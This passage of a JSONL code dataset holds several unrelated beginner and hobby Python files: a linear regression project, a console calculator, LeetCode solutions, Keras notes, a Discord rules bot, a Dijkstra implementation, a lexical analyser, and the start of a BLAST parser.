evaluated_cubes.add((nx, ny, nz))\n\n for cube in evaluated_cubes:\n x, y, z = cube\n active_neighbors = 0\n for nx in range(x - 1, x + 2):\n for ny in range(y - 1, y + 2):\n for nz in range(z - 1, z + 2):\n if (nx, ny, nz) in initial_cubes and (nx, ny, nz) != cube:\n active_neighbors += 1\n if (cube in initial_cubes and 2 <= active_neighbors <= 3) or active_neighbors == 3:\n new_cubes.add(cube)\n cubes = new_cubes\n print(f\"Result: {len(cubes)}\")\n","sub_path":"day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611389797","text":"# A level Computer Science Project 2019\r\n# Author: Matthew Byrne\r\n# Date: 7/10/19\r\n\r\n# Imports\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nx = [1,2,3,4,5,6,7,8,9,10,11,12]\r\nz = [13,14,15,16,17,18,19,20,21,22,23,24]\r\n\r\n# Equation Class, filled with useful procedures \r\nclass Equation:\r\n def __init__(self, contents): \r\n self.contents = contents\r\n self.equation = self.contents.replace(\" \",\"\").replace(\"y=\",\"\")\r\n \r\n if \" x\" in (\" \" + self.equation):\r\n self.equation = \"1\"+self.equation\r\n\r\n self.ac()\r\n self.x, self.y = self.evaluate()\r\n\r\n def ac(self):\r\n xPos = 0\r\n for i, I in enumerate(self.equation):\r\n if I.lower() == \"x\":\r\n xPos = i\r\n\r\n try:\r\n self.a = int(self.equation[:xPos]) if xPos > 0 else 1\r\n except ValueError:\r\n self.a = float(self.equation[:xPos]) if xPos > 0 else 1\r\n \r\n\r\n try:\r\n self.c = int(self.equation[xPos+2:])\r\n except ValueError:\r\n self.c = float(self.equation[xPos+2:])\r\n\r\n def __str__(self):\r\n return self.contents\r\n\r\n def __repr__(self):\r\n return self.contents\r\n\r\n def evaluate(self):\r\n x = []\r\n y = []\r\n\r\n for i in range(0,25):\r\n total = (self.a * i) + self.c\r\n x.append(i)\r\n y.append(total)\r\n\r\n return x,y\r\n\r\n def plot(self):\r\n plt.plot(self.x, self.y, color=\"black\")\r\n \r\n def predict(self, x):\r\n yPrediction = []\r\n\r\n for i in x:\r\n total = (self.a * i) + self.c\r\n yPrediction.append(total)\r\n\r\n return yPrediction\r\n\r\n# Global Subroutines\r\ndef findMean(data):\r\n total = 0\r\n tally = 0\r\n for i in data:\r\n total += i\r\n tally += 1\r\n\r\n mean = total / tally\r\n\r\n return mean\r\n\r\ndef sumVarTakeMean(data, mean): # Sum of variable - variable barred\r\n total = []\r\n\r\n for i in data:\r\n total.append(i - mean)\r\n\r\n return total\r\n\r\ndef sumVarTakeMeanSquared(data, mean): # Sum of (variable - variable barred) ** 2 \r\n total = 0\r\n\r\n for i in data:\r\n total += (i - mean) ** 2\r\n\r\n return total\r\n\r\ndef MultiplyArray(x, y):\r\n if type(x) is list and type(y) is list:\r\n total = 0\r\n for i, j in zip(x, y):\r\n total += i * j\r\n\r\n return total\r\n\r\n else:\r\n return x * y\r\n\r\ndef plot(x, y):\r\n plt.plot(x, y, color=\"red\", dashes=[5, 5])\r\n\r\ndef FormEquation(x,y):\r\n xBar = findMean(x) # Mean of x\r\n sumXtakeXbar = sumVarTakeMean(x, xBar) # Sigma x - x barred\r\n sumXtakeXbarSquared = sumVarTakeMeanSquared(x, xBar) # Sigma (x - x barred) ** 2\r\n\r\n\r\n yBar = findMean(y) # Mean of y\r\n sumYtakeYbar = sumVarTakeMean(y, yBar) # Sigma y - y barred\r\n\r\n sigVarsTakeMean = MultiplyArray(sumXtakeXbar, sumYtakeYbar)\r\n\r\n m = sigVarsTakeMean / sumXtakeXbarSquared\r\n c = yBar - (m * xBar)\r\n\r\n\r\n return m, c, xBar, yBar\r\n\r\ndef Rsquare(y, yBar, yPred):\r\n predMinBar = []\r\n actMinBar = []\r\n\r\n for i, j in zip(yPred, y):\r\n totalPred = (i - yBar) ** 2\r\n totalAct = (j - yBar) ** 2\r\n predMinBar.append(totalPred)\r\n actMinBar.append(totalAct)\r\n\r\n sumPred = sum(predMinBar)\r\n sumAct = sum(actMinBar)\r\n\r\n rSquare = sumPred / sumAct\r\n\r\n return rSquare\r\n\r\ndef optimise(x, y, line_equ, yBar, m, c, r2):\r\n optimisedUp = False\r\n optimisedDown = False\r\n\r\n optimalUp = line_equ.contents\r\n optimalDown = line_equ.contents\r\n\r\n oldR2Up = r2\r\n oldR2Down = r2\r\n\r\n i = 0.1\r\n j = 0.1\r\n\r\n\r\n # Incrementing m and comparing the r^2 \r\n while not optimisedUp and i < 5:\r\n new_equation = Equation(f\"y = {m+i}x + {c}\")\r\n newPredictions = new_equation.predict(x)\r\n newR2Up = Rsquare(y, yBar, newPredictions)\r\n\r\n if (1 - newR2Up) < (1 -oldR2Up) and (1 - newR2Up) >= 0:\r\n optimalUp = new_equation.contents\r\n oldR2Up = newR2Up\r\n i += 0.1\r\n\r\n else:\r\n optimisedUp = True\r\n\r\n # Decrementing m and comparing the r^2 \r\n while not optimisedDown and j < 5:\r\n new_equation = Equation(f\"y = {m-j}x + {c}\")\r\n newPredictions = new_equation.predict(x)\r\n newR2Down = Rsquare(y, yBar, newPredictions)\r\n\r\n if (1 - newR2Down) < (1 - oldR2Down) and (1 - newR2Down) >= 0:\r\n optimalDown = new_equation.contents\r\n oldR2Down = newR2Down\r\n j += 0.1\r\n\r\n else:\r\n optimisedDown = True\r\n\r\n\r\n # Comparing the Incremented r^2 to the decremented r^2 to see which is closer to 1\r\n if (1 - newR2Down) < (1 - newR2Up):\r\n return Equation(optimalDown)\r\n\r\n elif (1 - newR2Down) > (1 - newR2Up):\r\n return Equation(optimalUp)\r\n\r\n else:\r\n return line_equ\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Results\r\n \r\n y = [3,4,2,4,5,6,6,9,11,12,14,16]\r\n\r\n m, c, xBar, yBar = FormEquation(x, y)\r\n line_equ = Equation(f\"y = {m}x + {c}\")\r\n yPred = line_equ.predict(x)\r\n r2 = Rsquare(y, yBar, yPred)\r\n\r\n optimised_equation = optimise(x, y, line_equ, yBar, m, c, r2)\r\n\r\n predictions = optimised_equation.predict(x)\r\n r2 = Rsquare(y, yBar, predictions)\r\n\r\n plot(x, y)\r\n print(f\"This line models the data with a {r2 * 100}% accuracy\")\r\n plt.title(f\"Sales Prediction Using Linear Regression\\nAccuracy of approximately {round(r2 * 100)}%\")\r\n optimised_equation.plot()\r\n plt.legend([optimised_equation], loc=2)\r\n plt.ylabel(\"Sales (£1000)\")\r\n plt.xlabel(\"Time (Months)\")\r\n\r\n plt.savefig(\"output.png\")\r\n\r\n results = optimised_equation.y[12:]\r\n for i, I in enumerate(results):\r\n results[i] = round(I)\r\n\r\n plt.show()\r\n","sub_path":"linear_regression_MB.py","file_name":"linear_regression_MB.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574693284","text":"import argparse\nimport sys\n\n\nparser = argparse.ArgumentParser(description='Console calculator')\nparser.add_argument('-a', '--action', metavar='ACTION', type=str, action='store', help='performs an operation')\nparser.add_argument('-v', '--verbose', action='store_true', help ='verbose the statement')\nparser.add_argument('values', metavar=\"VALUES\", type=float, nargs=\"+\", help='input data')\n\nargs = parser.parse_args()\n\nif len(args.values) != 2:\n print('Input must contain 2 numbers')\n file = sys.stderr\n sys.exit(-1)\n\nif args.action:\n a, b = args.values[0], args.values[1]\n if args.action == '+':\n res = a+b\n elif args.action == '-':\n res = a-b\n elif args.action == '*':\n res = a*b\n elif args.action == '/':\n res = a/b\n else:\n print('incorrect operator')\n print(res)\n\nif args.verbose:\n print(a,' ',args.action,' ',b,' = ', res)","sub_path":"lab16/16-ex2.py","file_name":"16-ex2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476089096","text":"#方法一:自己方法\r\nclass Solution:\r\n def hasGroupsSizeX(self, deck: [int]) -> bool:\r\n import collections\r\n ret={}\r\n n=len(deck)\r\n if n<2:\r\n return False\r\n for i in range(n):\r\n ret[deck[i]]=ret.get(deck[i],0)+1\r\n #上面统计个数何以用 ret=collections.Counter(deck)\r\n\r\n a=min(ret.values())\r\n def gcd(x,y):\r\n small=min(x,y)\r\n while small:\r\n if x%small==0 and y%small ==0:\r\n return small\r\n else:\r\n small-=1\r\n #上面求最大公约数的函数可以用math.gcd()\r\n for j in ret.values():\r\n a=gcd(j,a)\r\n return a>1\r\na=Solution()\r\nprint(a.hasGroupsSizeX(deck=[1,1,2,2,2,2]))\r\n\r\n#官方方法:\r\nclass Solution:\r\n def hasGroupsSizeX(self, deck: [int]) -> bool:\r\n import math\r\n from functools import reduce #functools.reduce逐次对上次函数结果与当前序列元素应用函数\r\n import collections\r\n ret = collections.Counter(deck).values()\r\n return reduce(math.gcd,ret)>=2\r\n\r\n","sub_path":"序号题/914.py","file_name":"914.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"395772013","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\n# In[4]:\n\n\ntf.keras.version()\n\n\n# In[5]:\n\n\n#keras uses layers to build models, models are a graph of layers\n\n\n# In[8]:\n\n\nfrom tensorflow.keras import layers\n\n#type of model: Sequential\nmodel = tf.keras.Sequential()\n#creates a \"dense\" layer with 64 units \nmodel.add(layers.Dense(64,activation = 'relu'))\n\nmodel.add(layers.Dense(64, activation = 'relu'))\n#output layer has 10 units\nmodel.add(layers.Dense(10))\n\n\n# In[9]:\n\n\n#activation: sets activation function, default none\n#kernel_initializer/bias_initializer: creates layer's weights (kernels and biases)\n #name or callable, default \"Glorot uniform\"\n#kernel_regularizer/bias_regularizer: creates schemes that apply weights\n #ex L1 or L2, default none\n\n\n# In[10]:\n\n\n#CREATES LAYERS\n\n#creates relu layer\nlayers.Dense(64, activation = 'relu')\n#alternatively:\nlayers.Dense(64, activation = tf.nn.relu)\n#l1: lasso regression\n#l2: ridge regression\n\n#l1 regularization of factor .01 applied to kernel matrix\nlayers.Dense(64, kernel_regularizer=tf.keras.regularizers.l1(0.01))\n\nlayers.Dense(64, kernel_regularizer=tf.keras.regularizers.l2(.01))\n\n#linear layer that makes random orthonoganal matrix\nlayers.Dense(65, kernel_initializer=\"orthogonal\")\n\n#linear layer with bias vector initialized to 2.0\nlayers.Dense(64,bias_initializer=tf.keras.initializers.Constant(2.0))\n\n\n# In[11]:\n\n\n#SET UP TRAINING\n\nmodel=tf.keras.Sequential([\n #add in blank layers\n layers.Dense(64,activation='relu',input_shape=(32,)),\n layers.Dense(64,activation='relu'),\n layers.Dense(10)])\n#optimizer: specifies training procedure, ex Adam or SGD\n#loss: function to minimize during optimization\n#metrics: monitors training\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.01),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n# In[13]:\n\n\n#CREATE TRAINING MODEL\n#this example uses mean-squared error regression\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.01),\n loss='mse',#mean squared error\n metrics=['mae'])#mean absolute error\n\nmodel.compile(optimizer=tf.keras.optimizers.RMSprop(.01),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n# In[14]:\n\n\n#TRAIN\n\nimport numpy as np\n\ndata = np.random.random((1000,32))\nlabels = np.random.random((1000,10))\n\nmodel.fit(data,labels, epochs=10, batch_size=32)\n#epochs: an iteration over the entire set of input data\n#batch_size: integer size of each batch that will be iterated over\n #last batch may be smaller\n#validation_data: displays loss and metrics for data after each epoch\n\n\n# In[15]:\n\n\n#TRAINING WITH VALIDATION\n\nimport numpy as np\n\ndata = np.random.random((1000,32))\nlabels = np.random.random((1000,10))\n\nval_data = np.random.random((100,32))\nval_labels = np.random.random((100,10))\n\nmodel.fit(data, labels, epochs=10, batch_size=32,\n validation_data=(val_data,val_labels))\n\n\n# In[16]:\n\n\n#TRAIN FROM DATA SETS\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nmodel.fit(dataset, epochs=10)\n\n\n# In[18]:\n\n\n#validation with datasets\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nval_dataset = tf.data.Dataset.from_tensor_slices((val_data, val_labels))\nval_dataset = val_dataset.batch(32)\n\nmodel.fit(dataset, epochs=10,\n validation_data=val_dataset)\n\n\n# In[19]:\n\n\n#EVALUATE\n\ndata = np.random.random((1000, 32))\nlabels = np.random.random((1000, 10))\n\nmodel.evaluate(data, labels, batch_size = 32)\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nmodel.evaluate(dataset)\n\n\n# In[20]:\n\n\n#PREDICT OUTPUT\nresult = model.predict(data, batch_size = 32)\nprint(result.shape)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"RoyWIP/Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357711512","text":"from abc import ABC, abstractmethod\n\nclass Clothes(ABC):\n @abstractmethod\n def consumption(self):\n pass\n\nclass Coat(Clothes):\n def __init__(self, v):\n self.v = v\n\n @property\n def consumption(self):\n return self.v / 6.5 + 0.5\n\nclass Suit(Clothes):\n def __init__(self, h):\n self.h = h\n\n @property\n def consumption(self):\n return 2 * self.h + 0.3\n\n def sum_consumption(self, list_suits):\n a = 0\n for suit in list_suits:\n a += suit.consumption\n return a\n\ncoat = Coat(50)\ncostume = Suit(1.96)\ncostume_2 = Suit(1.24)\ncostume_3 = Suit(1.76)\ncostume_4 = Suit(2.10)\nlist_costumes = [costume_4, costume_3, costume_2, costume]\nprint(coat.consumption)\nprint(costume_2.consumption)\nprint(costume.sum_consumption(list_costumes))\n\n","sub_path":"lesson_7_task_2.py","file_name":"lesson_7_task_2.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"246330437","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\n\n\nclass crules(object):\n rules = [\n \"Follow the Discord Terms of Service and the Community Guidelines\",\n \"Don't be an asshole\",\n \"No discord invite links\",\n \"NSFW content is not allowed to any degree\",\n \"Keep it english in every chat\",\n \"No Political, religious, racial or highly depressive discussions\",\n \"Keep content in their respective channels\",\n \"No Promotion outside of #🔰│promotion\",\n \"Do not share personal information about others without their consent\",\n \"Staff will always have the last word\",\n \"Do not minimod\",\n \"Keep chat clean\"\n ]\n\n ruleinfo = [\n \"You can find the TOS here and the Community Guidelines at https://discord.com/terms.\",\n \"This includes things spamming, spoiling and being disrespectful.\",\n \"This includes sending invite links to server members without it being previously discussed.\",\n \"This also means any memes that are NSFW are not allowed.\",\n \"You are only allowed to speak a different language in #🤠│spam-east.\",\n \"If you feel like anyone is overstepping this rule, ping a staff member.\",\n \"Read channel descriptions and names.\",\n \"This includes telling people to check out #🔰│promotion.\",\n \"Respect each others privacy.\",\n \"If you feel like you’ve been treated unfairly, contact a staff member of higher power.\",\n \"This means if someone is breaking the rules, do not personally tell them not to, instead DM or ping staff about it and let the staff handle it.\",\n \"This mean no full caps, no copypastas or tYpInG LiKE tHIs.\"\n ]\n\n\nclass rules(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # variables\n right = '✅'\n wrong = '❌'\n\n def hembed(self, st: bool):\n if st:\n embed = discord.Embed(\n color=discord.Color.blue()\n )\n else:\n embed = discord.Embed(\n color=discord.Color.red()\n )\n return embed\n\n @commands.command(name=\"rule\")\n @commands.guild_only()\n @commands.has_permissions(manage_messages=True)\n @commands.cooldown(rate=1, per=3, type=BucketType.default)\n async def _rule(self, ctx, n: int=None):\n '''Displays the nth rule, if exits'''\n await ctx.message.delete()\n\n await ctx.trigger_typing()\n if n is not None:\n try:\n # deciding values\n rulenumber = 'Rule {0}'.format(n)\n rule = crules.rules[n - 1]\n ruleinfo = crules.ruleinfo[n - 1]\n\n # sending information\n embed = self.hembed(True)\n embed.set_author(name=rulenumber)\n\n # fields\n embed.add_field(name=rule, value=ruleinfo, inline=False)\n\n # indication\n emoji = self.right\n except:\n embed = self.hembed(False)\n\n # fields\n embed.add_field(name=\"syntax error\", value=\"Rule doesn't exist\", inline=False)\n\n # indication\n emoji = self.wrong\n else:\n # sending information\n embed = self.hembed(False)\n embed.set_author(name=\"Server Rules Command\")\n\n # fields\n embed.add_field(name=\"How to use it?\", value=\"Add the Number of rule you want to see/show as an argument \\n > []rule [number]\", inline=False)\n\n # indication\n emoji = self.right\n sent = await ctx.send(embed=embed)\n\n # indication\n await sent.add_reaction(emoji)\n\n @commands.command(name=\"rules\")\n @commands.has_permissions(manage_messages=True)\n @commands.cooldown(rate=1, per=3, type=BucketType.default)\n async def _rules(self, ctx):\n '''Displays all rules in one command'''\n await ctx.message.delete()\n\n ctx.trigger_typing()\n embed = self.hembed(True)\n embed.set_author(name='Server Rules!')\n if len(crules.rules) != 0:\n # indication\n emoji = self.right\n\n # fields\n for i in range(len(crules.rules)):\n # deciding values in each loop\n rulenumber = 'Rule {0}'.format(i+1)\n description = (\"**{0}**\\n{1}\".format(crules.rules[i], crules.ruleinfo[i]))\n\n # adding field\n embed.add_field(name=rulenumber, value=description, inline=False)\n else:\n # indication\n emoji = self.wrong\n\n # fields\n embed.add_field(name=\"No Server Rules\", value=\"This server currently has no rules set\", inline=False)\n embed.set_footer(text='use []rule [number] to view each rules*')\n\n # indication\n sent = await ctx.send(embed=embed)\n await sent.add_reaction(emoji)\n\n# =========================================================================================== #\ndef setup(bot):\n bot.add_cog(rules(bot))","sub_path":"cogs/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"579340868","text":"from GRAPH import GRAPH\nimport math\nclass Dijkstra(GRAPH): \n def Dijkstra(self, startPoint, endPoint):\n #creation d'un dictionnaire avec chemin le plus court\n dictDistance = {}\n for x in self.dictAdj:\n if x == startPoint:\n dictDistance[x] = (0, [x])\n else:\n dictDistance[x] = (math.inf,[])\n #variables nécessaire pour la première itération de la boucle pour\n closestPoint = startPoint\n distanceBetween = 0\n untreatedPoints = []\n treatedPoints = []\n for i in range(len(self.listPoint)):\n untreatedPoints.append(self.listPoint[i])\n #tant que le point le plus proche non traité n'est pas le point final\n while closestPoint != endPoint:\n #retirer le point traité\n untreatedPoints.remove(closestPoint)\n treatedPoints.append(closestPoint)\n #obtenir la liste des voisins\n neighborPoints = self.visiterSommet(closestPoint)\n #mettre a jour les voisins\n for i in range(len(neighborPoints)):\n #obtenir la distance entre les voisins et le point le plus proche\n for j in range(len(self.dictAdj[closestPoint])):\n if self.dictAdj[closestPoint][j][0] == neighborPoints[i]:\n distanceBetween = self.dictAdj[closestPoint][j][1]\n #mettre a jour la distance et le chemin si il est favorable\n if dictDistance[neighborPoints[i]][0] > dictDistance[closestPoint][0] + distanceBetween:\n dictDistance[neighborPoints[i]] = (dictDistance[closestPoint][0] + distanceBetween, dictDistance[closestPoint][1] + [neighborPoints[i]])\n #trouver le nouveau point le plus proche\n minimum = dictDistance[untreatedPoints[0]]\n minimumPoint = untreatedPoints[0]\n for i in range(len(untreatedPoints)):\n if dictDistance[untreatedPoints[i]] < minimum and dictDistance[untreatedPoints[i]] != -1:\n minimum = dictDistance[untreatedPoints[i]]\n minimumPoint = untreatedPoints[i]\n closestPoint = minimumPoint\n #rendre la distance la plus court entre le point de départ et le point d'arrivée en plus du chemin\n treatedPoints.append(closestPoint)\n self.printDistances(dictDistance, endPoint, treatedPoints)\n \n def printDistances(self, dictDistance, endPoint, treatedPoints):\n print(\"Voici la distance pour aller au point d'arrivé \", endPoint, \": \", dictDistance[endPoint][0], end = '. ')\n print(\"Le chemin est: \", dictDistance[endPoint][1][0], end = '')\n for i in range(len(dictDistance[endPoint][1]) - 1):\n print(\" -->\", dictDistance[endPoint][1][i+1], end = '')\n print('')\n print(\"Voici les points pour lesquelles un chemin optimale a été trouvé\")\n for x in treatedPoints:\n print(x, ' est à une distance minimum de ', dictDistance[x][0], ' en passant par: ', dictDistance[x][1][0], end = '')\n for i in range(len(dictDistance[x][1]) - 1):\n print (' --> ', dictDistance[x][1][i+1], end = '')\n print('')\n infinits = 0\n for x in dictDistance:\n if dictDistance[x][0] == math.inf:\n infinits += 1\n if len(treatedPoints) + infinits != len(dictDistance):\n print(\"Voici les points pour lesquelles un chemin a été trouvé, mais qui n'est peut-être pas optimal\")\n distancesOver = []\n for x in dictDistance:\n if (not (x in treatedPoints)) and (x != endPoint):\n if dictDistance[x][0] != math.inf:\n distancesOver.append(dictDistance[x][0])\n distancesOver.sort()\n for i in range(len(distancesOver)):\n for x in dictDistance:\n if dictDistance[x][0] == distancesOver[i]:\n print(x, ' est à une distance minimum de ', dictDistance[x][0], ' en passant par: ', dictDistance[x][1][0], end = '')\n for j in range(len(dictDistance[x][1]) - 1):\n print (' --> ', dictDistance[x][1][j+1], end = '')\n print('')\n if infinits != 0:\n print(\"Voici les points pour lesquelles on a eu la flemme de trouver un chemin, (c'est trop loin, j'y vais pas)\")\n for x in dictDistance:\n if dictDistance[x][0] == math.inf:\n print(x)\n \n def DijkstraPseudo(self, startPoint, endPoint):\n dictDistance = self.createDictShortPath(startPoint) #creation d'un dictionnaire avec chemin le plus court\n (closestPoint, distanceBetween, untreatedPoints) = self.initiateFirstWhile(startPoint) #variables nécessaire pour la première itération de la boucle pour\n while closestPoint != endPoint: #tant que le point le plus proche non traité n'est pas le point final\n untreatedPoints.remove(closestPoint) #retirer le point traité\n neighborPoints = self.visiterSommet(closestPoint)#obtenir la liste des voisins\n for i in range(len(neighborPoints)):#mettre a jour les voisins\n distanceBetween = self.getDistance(neighborPoints, closestPoint, i) #obtenir la distance entre les voisins et le point le plus proche\n dictDistance = self.updateDistance(dictDistance, distanceBetween, neighborPoints, closestPoint, i) #mettre a jour la distance et le chemin si il est favorable\n closestPoint = self.findClosest(dictDistance, untreatedPoints, i)#trouver le nouveau point le plus proche\n return(dictDistance[endPoint]) #rendre la distance la plus court entre le point de départ et le point d'arrivée en plus du chemin\n \n def createDictShortPath(self, startPoint):\n dictDistance = {}\n for x in self.dictAdj:\n if x == startPoint:\n dictDistance[x] = (0, [x])\n else:\n dictDistance[x] = (math.inf,[])\n return(dictDistance)\n \n def initiateFirstWhile(self,startPoint):\n closestPoint = startPoint\n distanceBetween = 0\n untreatedPoints = []\n for i in range(len(self.listPoint)):\n untreatedPoints.append(self.listPoint[i])\n return(closestPoint, distanceBetween, untreatedPoints)\n \n def getDistance(self,neighborPoints, closestPoint, i):\n for j in range(len(self.dictAdj[closestPoint])):\n if self.dictAdj[closestPoint][j][0] == neighborPoints[i]:\n distanceBetween = self.dictAdj[closestPoint][j][1]\n return(distanceBetween)\n \n def updateDistance(self, dictDistance, distanceBetween, neighborPoints, closestPoint, i):\n if dictDistance[neighborPoints[i]][0] > dictDistance[closestPoint][0] + distanceBetween:\n dictDistance[neighborPoints[i]] = (dictDistance[closestPoint][0] + distanceBetween, dictDistance[closestPoint][1] + [neighborPoints[i]])\n return(dictDistance)\n \n def findClosest(self, dictDistance, untreatedPoints, i):\n minimum = dictDistance[untreatedPoints[0]]\n minimumPoint = untreatedPoints[0]\n for i in range(len(untreatedPoints)):\n if dictDistance[untreatedPoints[i]] < minimum and dictDistance[untreatedPoints[i]] != -1:\n minimum = dictDistance[untreatedPoints[i]]\n minimumPoint = untreatedPoints[i]\n closestPoint = minimumPoint\n return(closestPoint)\n \nif __name__ == '__main__':\n wikiDictAdj = {'A' : [('B', 85),('C', 217),('E', 173)], 'B' : [('A', 85),('F', 80)], 'C' : [('A', 217),('G', 186),('H', 103)], 'D' : [('H', 183)], 'E' : [('A', 173),('J', 502)], 'F' : [('B', 80),('I', 250)], 'G' : [('C', 186)], 'H' : [('C', 103),('D', 183),('J', 167)], 'I' : [('F', 250),('J', 84)], 'J' : [('E', 502),('H', 167),('I', 84)]}\n \n GWikipedia = Dijkstra(wikiDictAdj)\n print(GWikipedia.listPoint)\n print(GWikipedia.matAdj)\n GWikipedia.Dijkstra('A', 'J')\n GWikipedia.Dijkstra('A', 'D')\n GWikipedia.Dijkstra('A', 'B')\n \"\"\"\n print(GWikipedia.DijkstraPseudo('A', 'J'))\n print(GWikipedia.DijkstraPseudo('A', 'D'))\n \"\"\"\n Exemple2matAdj = [[-1, -1, -1, 42, -1, 12],[-1, -1, 13, 2, -1, -1],[-1, 13, -1, 17, 15, -1],[42, 2, 17,-1,-1,-1],[-1, -1, 15, -1, -1,36],[12, -1, -1, -1, 36, -1]]\n Exemple2listPoint = ['A', 'B', 'C', 'D', 'E', 'F']\n \n GExemple2 = Dijkstra(matAdj = Exemple2matAdj, listPoint = Exemple2listPoint)\n \"\"\"\n print(GExemple2.DijkstraPseudo('A', 'C'))\n \"\"\"\n GExemple2.Dijkstra('A', 'C')\n \n \n Exemple3dictAdjEuclid = {'A' : ((0, 0), ['B', 'F']), 'B' : ((1, 1), ['A', 'C', 'F']), 'C' : ((2, 1), ['B', 'D']), 'D' : ((1, 3), ['C', 'E']), 'E' : ((3, 2), ['D', 'F']), 'F' : ((0, 2), ['A', 'E'])}\n GExemple3 = Dijkstra(dictAdjEuclid = Exemple3dictAdjEuclid)\n \"\"\"\n print(GExemple3.DijkstraPseudo('A', 'D'))\n \"\"\"\n GExemple3.Dijkstra('A', 'D')","sub_path":"NSI2.0/Projet_Dijkstra_Astar/Celian_Dijkstra.py","file_name":"Celian_Dijkstra.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640444510","text":"# Alunos: Fernando Souza (11218354) e Kevin Veloso (11318626)\n\nimport re\n\ntry:\n progFile = open('./data/program.txt', 'r')\n table = open('./data/table.txt', 'w')\n\n delimiters = [';', '.', ':', '(', ')', ':=', ',']\n relationalOperators = ['=', '<', '>', '<=', '>=', '<>']\n addOperators = ['+', '-', 'or']\n multOperators = ['*', '/', 'and']\n\n program = progFile.read()\n\n rmvComents = re.sub(r'({.*\\}|(//.*)|(\\t))', \"\", program) # remove os comentarios e tabulacoes\n lines = re.split(r'\\n', rmvComents) # divide em linhas\n tokens = list()\n\n # lines eh string. isso aqui vai transformar em um array onde cada elemento eh uma linha\n for line in lines:\n tokens.append(re.split(r'(\\s)|(^and)|(^or)|(<>)|(:=)|([0-9]+\\.[0-9]*)|(;|:|\\(|\\)|,|<|>|=|\\+|\\.|\\-|\\*|\\\\|\\/)', line))\n\n # Remove os espacos em branco seguidos\n for token in tokens:\n while ('') in token:\n token.remove('')\n while None in token:\n token.remove(None)\n count = 1\n\n \n for token in tokens:\n tempToken = token\n\n for temp in tempToken:\n if re.match(r'[0-9]+([a-z].*|[A-Z].*).*', temp):\n aux = temp\n table.write(re.sub(r'[a-z].*|[A-Z].*', '', temp) + ' | ' + 'INTEIRO' + ' | ' + str(count) + '\\n' ) \n temp = re.sub(r'[0-9]', '', aux)\n\n if temp in delimiters:\n table.write(temp + ' | ' + 'DELIMITADOR' + ' | ' + str(count) + '\\n' )\n \n elif temp in addOperators:\n table.write(temp + ' | ' + 'OPERADOR DE ADICAO' + ' | ' + str(count) + '\\n' )\n \n elif temp in multOperators:\n table.write(temp + ' | ' + 'OPERADOR MULTI' + ' | ' + str(count) + '\\n' )\n \n elif temp in relationalOperators:\n table.write(temp + ' | ' + 'OPERADOR RELACIONAL' + ' | ' + str(count) + '\\n' )\n\n else:\n if re.match(r'((program)|(var)|(integer)|(real)|(boolean)|(procedure)|(begin)|(end)|(if)|(then)|(else)|(while)|(do)|(not))', temp):\n table.write(str(temp) + ' | ' + 'PALAVRA RESERVADA' + ' | ' + str(count) + '\\n' )\n elif re.match(r'((true)|(false))', temp):\n table.write(str(temp) + ' | ' + 'BOOLEAN' + ' | ' + str(count) + '\\n' )\n elif re.match(r'([0-9]+\\.[0-9]*)', temp):\n table.write(str(temp) + ' | ' + 'REAL' + ' | ' + str(count) + '\\n' )\n elif re.match(r'[0-9]+', temp):\n table.write(str(temp) + ' | ' + 'INTEIRO' + ' | ' + str(count) + '\\n' )\n elif re.match(r'_*[a-zA-Z]+[0-9]*_*', temp):\n table.write(str(temp) + ' | ' + 'IDENTIFICADOR' + ' | ' + str(count) + '\\n' )\n count+=1\n\nfinally:\n progFile.close()\n table.close() ","sub_path":"firstProject/lexical.py","file_name":"lexical.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"575206096","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Marissa pier\nDate : 3 13 2019\nPurpose: Python program for blastomics\n\"\"\"\n\n\nimport os\nimport sys\nimport argparse\nimport csv\n#import Bio\n#from Bio import SeqIO\n\nfrom collections import defaultdict\n#-------------------------------------\n\ndef main():\n args = get_args()\n hits_header = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen', 'qstart', 'qend', 'sstart', 'send', 'evalue', 'bitscore']\n annotations_filename = args.annotations\n hits_filename = args.hits_file\n outfile = args.outfile\n\n if outfile=='':\n f_out = sys.stdout\n else:\n f_out = open(outfile,'w')\n\n if not os.path.isfile(hits_filename):\n print('\"{}\" is 